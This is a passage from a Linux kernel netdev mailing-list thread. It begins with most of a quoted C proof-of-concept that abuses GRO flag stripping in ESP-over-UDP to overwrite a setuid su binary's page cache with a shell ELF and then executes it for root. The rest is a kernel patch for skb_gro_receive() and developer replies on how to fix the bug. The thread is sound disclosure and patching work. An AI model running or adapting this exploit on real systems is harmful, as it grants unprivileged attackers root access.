in the init user namespace so that execve() of the > * corrupted setuid su binary honors the setuid bit, giving a real > * root shell rather than a fake namespace-root shell. > */ > fflush(stdout); fflush(stderr); > pid_t worker = fork(); > if (worker < 0) die("fork worker"); > if (worker > 0) { > int wstatus; > waitpid(worker, &wstatus, 0); > if (WIFEXITED(wstatus) && WEXITSTATUS(wstatus) == 1) { > char *argv[] = { (char *)target_file, NULL }; > char *envp[] = { NULL }; > execve(target_file, argv, envp); > } > return WIFEXITED(wstatus) ? WEXITSTATUS(wstatus) : 2; > } > > /* Child: enter user namespace and do the corruption */ > if (getuid() != 0) setup_userns(); > if (unshare(CLONE_NEWNET) < 0) gate_fail("unshare(CLONE_NEWNET)"); > if_up("lo"); > create_veth(); > > int p_ns[2], p_veth[2], p_rdy[2]; > if (pipe(p_ns) < 0 || pipe(p_veth) < 0 || pipe(p_rdy) < 0) die("pipe"); > fflush(stdout); fflush(stderr); > > pid_t rx = fork(); > if (rx < 0) die("fork"); > > if (rx == 0) { > close(p_ns[0]); close(p_veth[1]); close(p_rdy[0]); > if (unshare(CLONE_NEWNET) < 0) gate_fail("unshare(CLONE_NEWNET)"); > if (unshare(CLONE_NEWNS) < 0) gate_fail("unshare(CLONE_NEWNS)"); > mount("", "/", NULL, MS_PRIVATE | MS_REC, NULL); > mount("sysfs", "/sys", "sysfs", 0, NULL); > sync_write(p_ns[1]); close(p_ns[1]); > sync_read(p_veth[0]); close(p_veth[0]); > if_up("lo"); > ethtool_set(VETH1, ETHTOOL_SGRO, 1); > if_up(VETH1); > enable_veth_napi(VETH1); > add_addr(VETH1, ADDR_DST); > add_sa(); > int ufd = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0); > if (ufd < 0) gate_fail("socket"); > struct sockaddr_in ba = { .sin_family = AF_INET, .sin_port = htons(UDP_PORT) }; > inet_pton(AF_INET, ADDR_DST, &ba.sin_addr); > if (bind(ufd, (struct sockaddr *)&ba, sizeof(ba)) < 0) gate_fail("bind"); > int et = UDP_ENCAP_ESPINUDP, gro = 1; > setsockopt(ufd, IPPROTO_UDP, UDP_ENCAP, &et, sizeof(et)); > setsockopt(ufd, IPPROTO_UDP, UDP_GRO, &gro, sizeof(gro)); > sync_write(p_rdy[1]); > pause(); > _exit(0); > } > > close(p_ns[1]); close(p_veth[0]); close(p_rdy[1]); > sync_read(p_ns[0]); close(p_ns[0]); > move_to_netns(VETH1, rx); > sync_write(p_veth[1]); close(p_veth[1]); > if_up(VETH0); add_addr(VETH0, ADDR_SRC); > ethtool_set(VETH0, ETHTOOL_STSO, 0); > ethtool_set(VETH0, ETHTOOL_SGSO, 0); > > /* > * Add a netem delay on the sender veth so both datagrams sit in the > * qdisc until the timer fires, then get released into veth_xmit() > * within the same softirq context. This guarantees both land in one > * NAPI poll cycle for GRO to merge them, without needing sysfs > * gro_flush_timeout (which requires capable(CAP_NET_ADMIN) in the > * init namespace). tc uses netlink with ns_capable(), so it works > * from a user namespace. > */ > if (system("tc qdisc add dev " VETH0 " root netem delay 20ms") != 0) > gate_fail("tc netem"); > usleep(50000); > > sync_read(p_rdy[0]); close(p_rdy[0]); > > int sock = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0); > if (sock < 0) die("socket"); > struct sockaddr_in sa = { .sin_family = AF_INET, .sin_port = htons(UDP_PORT) }; > struct sockaddr_in da = { .sin_family = AF_INET, .sin_port = htons(UDP_PORT) }; > inet_pton(AF_INET, ADDR_SRC, &sa.sin_addr); > inet_pton(AF_INET, ADDR_DST, &da.sin_addr); > bind(sock, (struct sockaddr *)&sa, sizeof(sa)); > connect(sock, (struct sockaddr *)&da, sizeof(da)); > > int target_fd = open(target_file, O_RDONLY | O_CLOEXEC); > if (target_fd < 0) die("open target"); > > uint32_t seq = 1; > size_t total_changed = 0; > int delay_ms = 20; > int sleep_us = 40000; > struct timespec last_ok; > clock_gettime(CLOCK_MONOTONIC, &last_ok); > > printf("[*] replacing %d bytes starting at offset 0\n", PAYLOAD_LEN); > > /* Warmup: send a dummy pair to prime the netem/NAPI path */ > { > unsigned char w[16 + SPLICE_LEN]; > memset(w, 0, sizeof(w)); > store_be32(w, ESP_SPI); > store_be32(w + 4, seq++); > send(sock, w, sizeof(w), 0); > store_be32(w + 4, seq++); > send(sock, w, sizeof(w), 0); > usleep(sleep_us); > } > > for (int pass = 0; ; pass++) { > size_t pass_changed = 0, remaining = 0; > > for (int idx = 0; idx < PAYLOAD_LEN; idx++) { > unsigned char cur = read_byte_at(target_fd, idx); > if (cur == shell_elf[idx]) > continue; > remaining++; > > unsigned char need_ks = cur ^ shell_elf[idx]; > uint16_t nonce = stream_nonce[need_ks]; > unsigned char iv[8]; > memset(iv, 0xcc, sizeof(iv)); > store_be32(iv + 4, nonce); > > unsigned char hdr[16]; > char hp[] = "/tmp/fgro-XXXXXX"; > int hfd = mkstemp(hp); unlink(hp); > store_be32(hdr, ESP_SPI); store_be32(hdr + 4, seq++); > memcpy(hdr + 8, iv, 8); > write(hfd, hdr, 16); > > int pfd[2]; > pipe(pfd); > loff_t ho = 0; > splice(hfd, &ho, pfd[1], NULL, 16, 0); > loff_t so = (loff_t)idx; > splice(target_fd, &so, pfd[1], NULL, SPLICE_LEN, 0); > close(hfd); > > unsigned char p1[16 + SPLICE_LEN]; > store_be32(p1, ESP_SPI); store_be32(p1 + 4, seq++); > memcpy(p1 + 8, iv, 8); > memset(p1 + 16, 0x41, SPLICE_LEN); > send(sock, p1, sizeof(p1), 0); > > int cork = 1; > setsockopt(sock, IPPROTO_UDP, UDP_CORK, &cork, sizeof(cork)); > splice(pfd[0], NULL, sock, NULL, 16 + SPLICE_LEN, 0); > cork = 0; > setsockopt(sock, IPPROTO_UDP, UDP_CORK, &cork, sizeof(cork)); > close(pfd[0]); close(pfd[1]); > > usleep(sleep_us); > > unsigned char got = read_byte_at(target_fd, idx); > if (got == shell_elf[idx]) { > total_changed++; > pass_changed++; > clock_gettime(CLOCK_MONOTONIC, &last_ok); > printf("\r[+] byte %3d/%-3d 0x%02x -> 0x%02x ok (%zu changed)", > idx, PAYLOAD_LEN, cur, got, total_changed); > } else { > printf("\r[-] byte %3d/%-3d 0x%02x -> 0x%02x (want 0x%02x) MISS", > idx, PAYLOAD_LEN, cur, got, shell_elf[idx]); > } > fflush(stdout); > } > > if (remaining == 0) > break; > > size_t still_wrong = 0; > for (int idx = 0; idx < PAYLOAD_LEN; idx++) > if (read_byte_at(target_fd, idx) != shell_elf[idx]) > still_wrong++; > > if (still_wrong == 0) > break; > > struct timespec now; > clock_gettime(CLOCK_MONOTONIC, &now); > long elapsed = (now.tv_sec - last_ok.tv_sec) * 1000 + > (now.tv_nsec - last_ok.tv_nsec) / 1000000; > if (elapsed > 30000) { > printf("\n[!] %zu bytes stuck after 30s without progress\n", > still_wrong); > break; > } > > if (delay_ms < 500) { > delay_ms = delay_ms < 250 ? delay_ms * 2 : 500; > sleep_us = delay_ms * 2000; > char cmd[128]; > snprintf(cmd, sizeof(cmd), > "tc qdisc change dev " VETH0 " root netem delay %dms", > delay_ms); > system(cmd); > } > printf("\n[*] pass %d: %zu ok, %zu still wrong, delay now %dms, retrying\n", > pass + 1, pass_changed, still_wrong, delay_ms); > fflush(stdout); > } > > close(target_fd); > close(sock); > kill(rx, SIGTERM); > waitpid(rx, NULL, 0); > > /* Final verification: count how many bytes match shell_elf */ > int final_fd = open(target_file, O_RDONLY | O_CLOEXEC); > size_t matching = 0; > if (final_fd >= 0) { > for (int i = 0; i < PAYLOAD_LEN; i++) > if (read_byte_at(final_fd, i) == shell_elf[i]) > matching++; > close(final_fd); > } > > printf("\n\n"); > if (total_changed > 0) { > printf("VULNERABLE: %zu/%d payload bytes now match shell_elf " > "(%zu written via GRO flag-strip)\n", > matching, PAYLOAD_LEN, total_changed); > _exit(1); > } > > printf("FIXED: 0/%d bytes changed\n", PAYLOAD_LEN); > _exit(0); > } > From c3ec785f197bf329c443aa547eb70864e2ef29ac Mon Sep 17 00:00:00 2001 > From: Sultan Alsawaf <sultan@kerneltoast.com> > Date: Wed, 13 May 2026 21:47:51 -0700 > Subject: [PATCH] net: gro: propagate SKBFL_SHARED_FRAG in skb_gro_receive() > > skb_gro_receive() moves frag descriptors from the incoming skb to the > GRO accumulator through two frag-transfer paths (the direct frag-move > loop and the head_frag + memcpy path) without propagating the > SKBFL_SHARED_FRAG flag from the incoming skb's shinfo->flags. As a > result, the accumulator ends up holding references to externally owned > or page-cache-backed pages while reporting skb_has_shared_frag() as > false. > > This is the same bug class as CVE-2026-46300 (d8cfbcdd07557, "net: > skbuff: propagate shared-frag marker through frag-transfer helpers"), > which fixed the identical omission in __pskb_copy_fclone(), > skb_try_coalesce(), and skb_shift(). skb_gro_receive() was missed in > that fix since it lives in net/core/gro.c rather than net/core/skbuff.c. > > The impact is observable through ESP-over-UDP with UDP GRO: splice() > attaches page-cache pages to a UDP skb, setting SKBFL_SHARED_FRAG via > ip_append_page(). When two such datagrams are GRO-merged via > skb_gro_receive(), the flag is dropped. After udp_rcv_segment() > re-segments the merged GSO skb, the fresh segments carry the > page-cache frags without the shared-frag marker. esp_input() then sees > !skb_cloned() && !skb_has_shared_frag() and takes the skip_cow fast > path, decrypting in place over the page-cache pages. Because AES-GCM > CTR decryption runs before the authentication tag is verified, the > page cache is corrupted even though the tag check subsequently fails. > > Fix it by propagating SKBFL_SHARED_FRAG from the incoming skb to the > accumulator in both frag-transfer paths, matching what the skbuff.c > helpers already do. The third path (frag_list merge at the "merge:" > label) chains the entire incoming skb onto the accumulator's frag_list > without moving individual frag descriptors, so each sub-skb retains > its own flags and no propagation is needed there. > > Fixes: cef401de7be8 ("net: fix possible wrong checksum generation") > Fixes: f4c50a4034e6 ("xfrm: esp: avoid in-place decrypt on shared skb frags") > Cc: stable@vger.kernel.org > Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com> > Signed-off-by: Sultan Alsawaf <sultan@kerneltoast.com> > --- > net/core/gro.c | 4 ++++ > 1 file changed, 4 insertions(+) > > diff --git a/net/core/gro.c b/net/core/gro.c > index 31d21de5b15a7..4ac41ced13aeb 100644 > --- a/net/core/gro.c > +++ b/net/core/gro.c > @@ -145,6 +145,8 @@ int skb_gro_receive(struct sk_buff *p, struct sk_buff *skb) > skb_frag_off_add(frag, offset); > skb_frag_size_sub(frag, offset); > > + pinfo->flags |= skbinfo->flags & SKBFL_SHARED_FRAG; > + > /* all fragments truesize : remove (head size + sk_buff) */ > new_truesize = SKB_TRUESIZE(skb_end_offset(skb)); > delta_truesize = skb->truesize - new_truesize; > @@ -176,6 +178,8 @@ int skb_gro_receive(struct sk_buff *p, struct sk_buff *skb) > memcpy(frag + 1, skbinfo->frags, sizeof(*frag) * skbinfo->nr_frags); > /* We dont need to clear skbinfo->nr_frags here */ > > + pinfo->flags |= skbinfo->flags & SKBFL_SHARED_FRAG; > + > new_truesize = SKB_DATA_ALIGN(sizeof(struct sk_buff)); > delta_truesize = skb->truesize - new_truesize; > skb->truesize = new_truesize; > -- > 2.54.0 > ^ permalink raw reply [flat|nested] 6+ messages in thread
* Re: [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers 2026-05-13 21:07 [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers Hyunwoo Kim 2026-05-14 6:18 ` Sultan Alsawaf @ 2026-05-14 8:04 ` Paolo Abeni 2026-05-14 9:38 ` Hyunwoo Kim 1 sibling, 1 reply; 6+ messages in thread From: Paolo Abeni @ 2026-05-14 8:04 UTC (permalink / raw) To: Hyunwoo Kim, kuba, steffen.klassert Cc: netdev, stable, mhal, davem, horms, edumazet, kerneljasonxing, herbert, vakzz, kuniyu, jiayuan.chen, ben, dsahern, Sabrina Dubroca On 5/13/26 11:07 PM, Hyunwoo Kim wrote: > Three frag-transfer helpers (__pskb_copy_fclone(), skb_try_coalesce(), > and skb_shift()) fail to propagate the SKBFL_SHARED_FRAG bit in > skb_shinfo()->flags when moving frags from source to destination. > __pskb_copy_fclone() defers the rest of the shinfo metadata to > skb_copy_header() after copying frag descriptors, but that helper > only carries over gso_{size,segs,type} and never touches > skb_shinfo()->flags; skb_try_coalesce() and skb_shift() move frag > descriptors directly and leave flags untouched. As a result, the > destination skb keeps a reference to the same externally-owned or > page-cache-backed pages while reporting skb_has_shared_frag() as > false. > > The mismatch is harmful in any in-place writer that uses > skb_has_shared_frag() to decide whether shared pages must be detoured > through skb_cow_data(). ESP input is one such writer (esp4.c, > esp6.c), and a single nft 'dup to <local>' rule -- or any other > nf_dup_ipv4() / xt_TEE caller -- is enough to land a pskb_copy()'d > skb in esp_input() with the marker stripped, letting an unprivileged > user write into the page cache of a root-owned read-only file via > authencesn-ESN stray writes. > > Set SKBFL_SHARED_FRAG on the destination whenever frag descriptors > were actually moved from the source. skb_copy() and skb_copy_expand() > share skb_copy_header() too but linearize all paged data into freshly > allocated head storage and emerge with nr_frags == 0, so > skb_has_shared_frag() returns false on its own; they need no change. > > Fixes: cef401de7be8 ("net: fix possible wrong checksum generation") > Fixes: f4c50a4034e6 ("xfrm: esp: avoid in-place decrypt on shared skb frags") WRT the 2nd fixes tag, I *think* f4c50a4034e6 would need additionally/instead a follow-up similar to the one mentioned by Jakub here: https://lore.kernel.org/all/20260510084520.476745b5@kernel.org/ /P ^ permalink raw reply [flat|nested] 6+ messages in thread
* Re: [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers 2026-05-14 8:04 ` Paolo Abeni @ 2026-05-14 9:38 ` Hyunwoo Kim 2026-05-14 10:21 ` Sabrina Dubroca 0 siblings, 1 reply; 6+ messages in thread From: Hyunwoo Kim @ 2026-05-14 9:38 UTC (permalink / raw) To: Paolo Abeni Cc: kuba, steffen.klassert, netdev, stable, mhal, davem, horms, edumazet, kerneljasonxing, herbert, vakzz, kuniyu, jiayuan.chen, ben, dsahern, Sabrina Dubroca, imv4bel On Thu, May 14, 2026 at 10:04:29AM +0200, Paolo Abeni wrote: > On 5/13/26 11:07 PM, Hyunwoo Kim wrote: > > Three frag-transfer helpers (__pskb_copy_fclone(), skb_try_coalesce(), > > and skb_shift()) fail to propagate the SKBFL_SHARED_FRAG bit in > > skb_shinfo()->flags when moving frags from source to destination. > > __pskb_copy_fclone() defers the rest of the shinfo metadata to > > skb_copy_header() after copying frag descriptors, but that helper > > only carries over gso_{size,segs,type} and never touches > > skb_shinfo()->flags; skb_try_coalesce() and skb_shift() move frag > > descriptors directly and leave flags untouched. As a result, the > > destination skb keeps a reference to the same externally-owned or > > page-cache-backed pages while reporting skb_has_shared_frag() as > > false. > > > > The mismatch is harmful in any in-place writer that uses > > skb_has_shared_frag() to decide whether shared pages must be detoured > > through skb_cow_data(). ESP input is one such writer (esp4.c, > > esp6.c), and a single nft 'dup to <local>' rule -- or any other > > nf_dup_ipv4() / xt_TEE caller -- is enough to land a pskb_copy()'d > > skb in esp_input() with the marker stripped, letting an unprivileged > > user write into the page cache of a root-owned read-only file via > > authencesn-ESN stray writes. > > > > Set SKBFL_SHARED_FRAG on the destination whenever frag descriptors > > were actually moved from the source. skb_copy() and skb_copy_expand() > > share skb_copy_header() too but linearize all paged data into freshly > > allocated head storage and emerge with nr_frags == 0, so > > skb_has_shared_frag() returns false on its own; they need no change. > > > > Fixes: cef401de7be8 ("net: fix possible wrong checksum generation") > > Fixes: f4c50a4034e6 ("xfrm: esp: avoid in-place decrypt on shared skb frags") > > WRT the 2nd fixes tag, I *think* f4c50a4034e6 would need > additionally/instead a follow-up similar to the one mentioned by Jakub here: > > https://lore.kernel.org/all/20260510084520.476745b5@kernel.org/ Agreed. tracing SKBFL_SHARED_FRAG propagation paths one by one is not a robust direction for the fix. Even minor logic changes elsewhere could cause the issue to resurface. As a follow-up, eliminating the in-place handling in esp_input -- accepting the performance trade-off -- seems necessary. That was actually the direction of my initial proposal: https://lore.kernel.org/all/afLDKSvAvMwGh7Fy@v4bel/ Best regards, Hyunwoo Kim ^ permalink raw reply [flat|nested] 6+ messages in thread
* Re: [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers 2026-05-14 9:38 ` Hyunwoo Kim @ 2026-05-14 10:21 ` Sabrina Dubroca 0 siblings, 0 replies; 6+ messages in thread From: Sabrina Dubroca @ 2026-05-14 10:21 UTC (permalink / raw) To: Hyunwoo Kim Cc: Paolo Abeni, kuba, steffen.klassert, netdev, stable, mhal, davem, horms, edumazet, kerneljasonxing, herbert, vakzz, kuniyu, jiayuan.chen, ben, dsahern 2026-05-14, 18:38:34 +0900, Hyunwoo Kim wrote: > On Thu, May 14, 2026 at 10:04:29AM +0200, Paolo Abeni wrote: > > On 5/13/26 11:07 PM, Hyunwoo Kim wrote: > > > Three frag-transfer helpers (__pskb_copy_fclone(), skb_try_coalesce(), > > > and skb_shift()) fail to propagate the SKBFL_SHARED_FRAG bit in > > > skb_shinfo()->flags when moving frags from source to destination. > > > __pskb_copy_fclone() defers the rest of the shinfo metadata to > > > skb_copy_header() after copying frag descriptors, but that helper > > > only carries over gso_{size,segs,type} and never touches > > > skb_shinfo()->flags; skb_try_coalesce() and skb_shift() move frag > > > descriptors directly and leave flags untouched. As a result, the > > > destination skb keeps a reference to the same externally-owned or > > > page-cache-backed pages while reporting skb_has_shared_frag() as > > > false. > > > > > > The mismatch is harmful in any in-place writer that uses > > > skb_has_shared_frag() to decide whether shared pages must be detoured > > > through skb_cow_data(). ESP input is one such writer (esp4.c, > > > esp6.c), and a single nft 'dup to <local>' rule -- or any other > > > nf_dup_ipv4() / xt_TEE caller -- is enough to land a pskb_copy()'d > > > skb in esp_input() with the marker stripped, letting an unprivileged > > > user write into the page cache of a root-owned read-only file via > > > authencesn-ESN stray writes. > > > > > > Set SKBFL_SHARED_FRAG on the destination whenever frag descriptors > > > were actually moved from the source. skb_copy() and skb_copy_expand() > > > share skb_copy_header() too but linearize all paged data into freshly > > > allocated head storage and emerge with nr_frags == 0, so > > > skb_has_shared_frag() returns false on its own; they need no change. > > > > > > Fixes: cef401de7be8 ("net: fix possible wrong checksum generation") > > > Fixes: f4c50a4034e6 ("xfrm: esp: avoid in-place decrypt on shared skb frags") > > > > WRT the 2nd fixes tag, I *think* f4c50a4034e6 would need > > additionally/instead a follow-up similar to the one mentioned by Jakub here: > > > > https://lore.kernel.org/all/20260510084520.476745b5@kernel.org/ > > Agreed. tracing SKBFL_SHARED_FRAG propagation paths one by one is > not a robust direction for the fix. Even minor logic changes elsewhere > could cause the issue to resurface. > > As a follow-up, eliminating the in-place handling in esp_input -- accepting It would close this group of vulnerabilities, but there are other parts of the networking stack that consume this flag. For those, chasing missing flag propagation is still a useful task. > the performance trade-off -- seems necessary. That was actually the > direction of my initial proposal: > > https://lore.kernel.org/all/afLDKSvAvMwGh7Fy@v4bel/ But you chose to abandon this approach (I guess because of the AI feedback Simon forwarded? feedback doesn't necessarily mean "drop this entirely"). -- Sabrina ^ permalink raw reply [flat|nested] 6+ messages in thread
end of thread, other threads:[~2026-05-14 10:21 UTC | newest] Thread overview: 6+ messages (download: mbox.gz follow: Atom feed -- links below jump to the message on this page -- 2026-05-13 21:07 [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers Hyunwoo Kim 2026-05-14 6:18 ` Sultan Alsawaf 2026-05-14 9:23 ` Hyunwoo Kim 2026-05-14 8:04 ` Paolo Abeni 2026-05-14 9:38 ` Hyunwoo Kim 2026-05-14 10:21 ` Sabrina Dubroca
This is a public inbox, see mirroring instructions for how to clone and mirror all data and code used for this inbox